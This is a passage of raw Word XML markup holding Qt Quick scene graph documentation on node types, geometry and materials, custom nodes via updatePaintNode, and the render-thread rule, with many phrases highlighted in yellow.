        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contain any active drawing code nor virtual</w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>paint()</w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="00C207C4" w:rsidRDefault="001113FB" w:rsidP="001113FB">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Even though the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>node tree is mostly built internally by the existing Qt Quick QML types</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009F0E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>it is possible for users to also add complete subtrees with their own content, including subtrees that represent 3D models</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="009F0E57">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1609" w:name="nodes"/>
      <w:bookmarkStart w:id="1610" w:name="_Toc483000880"/>
      <w:bookmarkStart w:id="1611" w:name="_Toc483003873"/>
      <w:bookmarkStart w:id="1612" w:name="_Toc483604224"/>
      <w:bookmarkStart w:id="1613" w:name="_Toc483605444"/>
      <w:bookmarkEnd w:id="1609"/>
      <w:r w:rsidRPr="009F0E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nodes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1610"/>
      <w:bookmarkEnd w:id="1611"/>
      <w:bookmarkEnd w:id="1612"/>
      <w:bookmarkEnd w:id="1613"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>most important</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> node for users is the</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1974" w:history="1">
        <w:r w:rsidRPr="00C207C4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGGeometryNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is used to define </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>custom graphics</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by defining its </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>geometry</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>material</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The geometry is defined using</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1975" w:history="1">
        <w:r w:rsidRPr="00C207C4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGGeometry</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and describes the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shape or mesh of the graphical primitive</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It can be a line, a rectangle, a polygon, many disconnected rectangles, or complex 3D mesh. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>material defines</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> how the pixels in this shape are filled.</w:t>
      </w:r>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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>node can have any number of children</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and geometry nodes will be rendered so they appear in child-order with parents behind their children.</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C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This does </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not say</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> anything about the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>actual rendering order</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the renderer. Only the visual output is guaranteed.</w:t>
      </w:r>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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The available nodes are:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="1429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327"/>
        <w:gridCol w:w="9968"/>
      </w:tblGrid>
      <w:tr w:rsidR="001113FB" w:rsidRPr="002230B8" w:rsidTr="001113FB">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490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1976" w:history="1">
              <w:r w:rsidR="001113FB" w:rsidRPr="00C207C4">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGClipNode</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Implements the clipping functionality in the scene graph</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001113FB" w:rsidRPr="002230B8" w:rsidTr="001113FB">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490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1977" w:history="1">
              <w:r w:rsidR="001113FB" w:rsidRPr="00C207C4">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGGeometryNode</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>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Used for all rendered content in the scene graph</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001113FB" w:rsidRPr="002230B8" w:rsidTr="001113FB">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490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1978" w:history="1">
              <w:r w:rsidR="001113FB" w:rsidRPr="00C207C4">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGNode</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The base class for all nodes in the scene graph</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001113FB" w:rsidRPr="002230B8" w:rsidTr="001113FB">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490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1979" w:history="1">
              <w:r w:rsidR="001113FB" w:rsidRPr="00C207C4">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGOpacityNode</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>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Used to change opacity of nodes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001113FB" w:rsidRPr="002230B8" w:rsidTr="001113FB">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490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1980" w:history="1">
              <w:r w:rsidR="001113FB" w:rsidRPr="00C207C4">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGTransformNode</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:t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Implements transformations in the scene graph</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Custom</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nodes are added to the scene graph by </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>subclassing</w:t>
      </w:r>
      <w:r w:rsidR="00C207C4" w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1981" w:anchor="updatePaintNode" w:history="1">
        <w:r w:rsidRPr="00C207C4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem::updatePaintNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and setting the</w:t>
      </w:r>
      <w:r w:rsidR="00C207C4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1982" w:anchor="Flag-enum" w:history="1">
        <w:r w:rsidRPr="00C207C4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem::ItemHasContents</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C207C4" w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Warning</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="009F0E57">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">It is </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>crucial</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that OpenGL operations and interaction with the scene graph happens exclusively on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>render thread</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, primarily during the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>updatePaintNode() call</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The rule</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of thumb is to only use classes with the "QSG" prefix inside the</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1983" w:anchor="updatePaintNode" w:history="1">
        <w:r w:rsidRPr="001113FB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickItem::updatePaintNode</w:t>
        </w:r>
